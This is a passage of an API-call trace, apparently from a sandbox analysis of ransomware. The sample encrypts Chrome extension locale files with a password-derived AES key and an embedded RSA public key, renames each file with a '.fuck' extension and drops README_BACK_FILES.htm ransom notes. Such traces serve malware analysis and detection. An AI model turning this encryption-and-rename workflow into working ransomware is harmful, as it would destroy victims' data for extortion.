lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.869] GetLastError () returned 0x0 [0257.869] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json")) returned 0x20 [0257.869] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json", dwFileAttributes=0x80) returned 1 [0257.870] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.871] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.872] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.873] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79488) returned 1 [0257.875] CryptCreateHash (in: hProv=0x2e79488, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.875] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.875] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.875] CryptDeriveKey (in: hProv=0x2e79488, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fc80) returned 1 [0257.875] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.875] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.875] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79048) returned 1 [0257.875] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79048, dwCertEncodingType=0x1, pInfo=0x2e25510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25548*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e80040) returned 1 [0257.875] CryptEncrypt (in: hKey=0x2e80040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.876] CryptEncrypt (in: hKey=0x2e80040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79268*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79268*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.876] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79268*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79268*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.877] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x14e, lpOverlapped=0x0) returned 1 [0257.877] CryptEncrypt (in: hKey=0x2e7fc80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x14e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x150) returned 1 [0257.878] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x150, lpOverlapped=0x0) returned 1 [0257.878] CloseHandle (hObject=0x5d5c) returned 1 [0257.878] CloseHandle (hObject=0x5d60) returned 1 [0257.878] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json"), bFailIfExists=0) returned 1 [0257.881] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json", dwFileAttributes=0x0) returned 1 [0257.881] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.gsg")) returned 1 [0257.883] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\messages.json.fuck")) returned 1 [0257.884] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0257.884] CryptDestroyKey (hKey=0x2e7fc80) returned 1 [0257.884] CryptReleaseContext (hProv=0x2e79488, dwFlags=0x0) returned 1 [0257.884] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.884] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0257.884] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\readme_back_files.htm")) returned 0xffffffff [0257.884] AreFileApisANSI () returned 1 [0257.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.885] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.885] GetFileType (hFile=0x5d50) returned 0x1 [0257.886] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.887] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.887] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7f9c0 [0257.887] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.887] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.887] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.888] GetLastError () returned 0x0 [0257.888] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json")) returned 0x20 [0257.888] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0257.888] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.889] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.890] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.892] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79b70) returned 1 [0257.894] CryptCreateHash (in: hProv=0x2e79b70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.894] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.894] CryptHashData (hHash=0x2e7fa40, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.894] CryptDeriveKey (in: hProv=0x2e79b70, Algid=0x6610, hBaseData=0x2e7fa40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e80080) returned 1 [0257.894] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.894] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.894] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e792f0) returned 1 [0257.894] CryptImportPublicKeyInfo (in: hCryptProv=0x2e792f0, dwCertEncodingType=0x1, pInfo=0x2e256b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e256e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e256e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fa80) returned 1 [0257.894] CryptEncrypt (in: hKey=0x2e7fa80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.895] CryptEncrypt (in: hKey=0x2e7fa80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79950*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79950*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.895] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79950*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79950*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.896] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc5, lpOverlapped=0x0) returned 1 [0257.897] CryptEncrypt (in: hKey=0x2e80080, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc5, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.897] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.897] CloseHandle (hObject=0x5d60) returned 1 [0257.897] CloseHandle (hObject=0x5d5c) returned 1 [0257.897] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0257.900] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0257.900] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.gsg")) returned 1 [0257.908] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\messages.json.fuck")) returned 1 [0257.910] CryptDestroyHash (hHash=0x2e7fa40) returned 1 [0257.910] CryptDestroyKey (hKey=0x2e80080) returned 1 [0257.910] CryptReleaseContext (hProv=0x2e79b70, dwFlags=0x0) returned 1 [0257.910] FindNextFileA (in: hFindFile=0x2e7f9c0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.910] FindClose (in: hFindFile=0x2e7f9c0 | out: hFindFile=0x2e7f9c0) returned 1 [0257.910] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0257.910] AreFileApisANSI () returned 1 [0257.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.910] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.911] GetFileType (hFile=0x5d50) returned 0x1 [0257.911] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.913] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.913] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fac0 [0257.914] FindNextFileA (in: hFindFile=0x2e7fac0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.914] FindNextFileA (in: hFindFile=0x2e7fac0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.914] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.914] GetLastError () returned 0x0 [0257.914] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json")) returned 0x20 [0257.914] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0257.915] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.916] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.917] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.918] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79b70) returned 1 [0257.920] CryptCreateHash (in: hProv=0x2e79b70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.920] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.920] CryptHashData (hHash=0x2e7fe40, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.920] CryptDeriveKey (in: hProv=0x2e79b70, Algid=0x6610, hBaseData=0x2e7fe40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fa40) returned 1 [0257.921] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 